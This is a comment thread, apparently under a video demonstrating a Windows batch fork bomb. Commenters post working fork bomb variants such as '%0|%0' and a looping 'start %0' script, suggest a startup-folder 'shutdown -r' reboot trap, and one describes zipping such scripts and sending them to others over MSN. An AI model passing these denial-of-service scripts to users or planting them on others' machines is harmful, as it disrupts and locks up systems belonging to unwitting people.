  • Wow. (sarcasm)

  • if you also add the name of the file inside a file - then you get a real fork bomb :D

for example if the file is named forkbomb.bat

    :s

    start %0

    forkbomb

    goto s

  • whatever you do don't put it in the startup folder :P

For the anarchist children out there who really wanna have fun put the following in a batch file

    shutdown -r

now put that batch file in your startup directory

  • Or you could use start iexplorer.exe it would use up a lot more memory ^.^

  • HOLY SHI* DUDE

  • "Windows users, don't be fooled into thinking you 're invulnerable?...This is what happens on a Windows system when you run a fork bomb"

Dude, this is what happens in EVERY system when you run a fork bomb, unless you configure process limitations.

  • When i create it... it doesnt go off when i save it? i gotta open it after ive saved it to make it blow right? just incase it ruin my pc:P

  • @mikejogreen you must open it to run it

  • low disk space. HOLY CRAP THIS IS COOL!

  • is there a space between the ":" and the "s"??

  • @timendil no theres no space

  • %0|%0 also works

  • i know for a fact that any system (of any company or OS) can experiance a complete and total "OH F***" moments...and just fyi dude, LINUX and MAC are not as invsincible as everyone says they are, so get used to the world being full of idiodiac peices of crap, @ to all of you people who think your better cause you own somthing or went somewhere, you have no clue what kind of trouble you can get yourself into trying to brag to a world of people with nothing better to do...so remeber, its the users

  • Oh dear Lord I use windows what will I do now? How do i delete this evil "swap file?"

Don't be a idiot. linux, windows, and macs all have their uses and linux cannot replace them. To each their own. I use the former two but I sure as hell don't want fanboi's of any one of them running all over the place. You're not better because you use linux.

A user of any system can get pwned by being ignorant.

  • Exactly, each OS has it's bests.

    Windows - Office and games

    Macintosh - Graphics and media

Linux - Development and open source

  • muahahahaha

    = )

  • Lol I did it and it works its weird,

  • epic own

  • You, dear sir, are a moron.

  • fucking wanna be hacker using cmd to run it lulz try just clicking it -.-

  • omg, i had no idea this could happen. And I though windows was safe :(

Is there any way to prevent this from happening?!?!?!?

  • if you add a %0|%0 between the 2nd and third lines its much quicker/deadlier!

  • I tried this on a 478 computer and it never stopped responding. Although it kept pushing itself to the front.

  • Not really. I have one that will do it in just one Window

  • usually, your computer will auto-reboot when your CPU usage gets to %100.

  • This would be a pretty stupid thing for an OS to do. That's like saying "usually, your disk will auto-re-format when it's full". By the way, you obviously have no grasp of computers, therefore you should chose another nick name.

  • Ctrl+C doesn't work on a well forged fork bomb. It only works if the code generates a single process each time and then silences.

An average fork bomb (like the one on the vid) generates a tree of processes, depending on your hardware power, from 72 to 240 processes per second, which also create proccesses of their own... at that point, Ctrl+C can end only one process.

Imagine pressing the keys 5 times in a second (real fast), you'll end 5 of almost 130 processes, 4300 in two secs

  • Why did those guys actually build the possibility into that.

I've even seen something a lot weirder.

Just another script or something. But there was some kinda text in it like "Start fork" or something.

Not that I care much why they did include it. You can make fun of other people with it...

  • i tryed it on my test pc (win 95 700mgb ibm crap box dos and win 95 lol) it dident effect it

  • linux forkbombs are worse, it took like 2 seconds form my laptop to lockup, dual core, 2 gigs ram, ubuntu. Can't even use magic sysreq keys, had ot do a hard restart.

  • Wouldn't:

    "START forkbomb.bat"

    Be easier?

  • ctrl + c to stop forkbomb ..

  • this actually helped me a lot. thanks so much. someone sent me one in a zipped folder via email and i accidently opened it. i managed to remember this, and you just saved me. lol he made it open minesweeper over and over...

  • that would only stop one cmd but there is more then one opening windows so this would not work

  • I've put a fork bomb, and a batch that restarts a computer into a zip file. This lets you send them over msn....yes thats right...I've also found one that completely mucks up the computers msn...its been so much fun

  • theres an even shorter one.

    "0%|0%"

    without quotes.

  • wats a fork bomb?

  • does this harm the computer in anyway

  • nope!

  • No. you will need only restart your computer :]
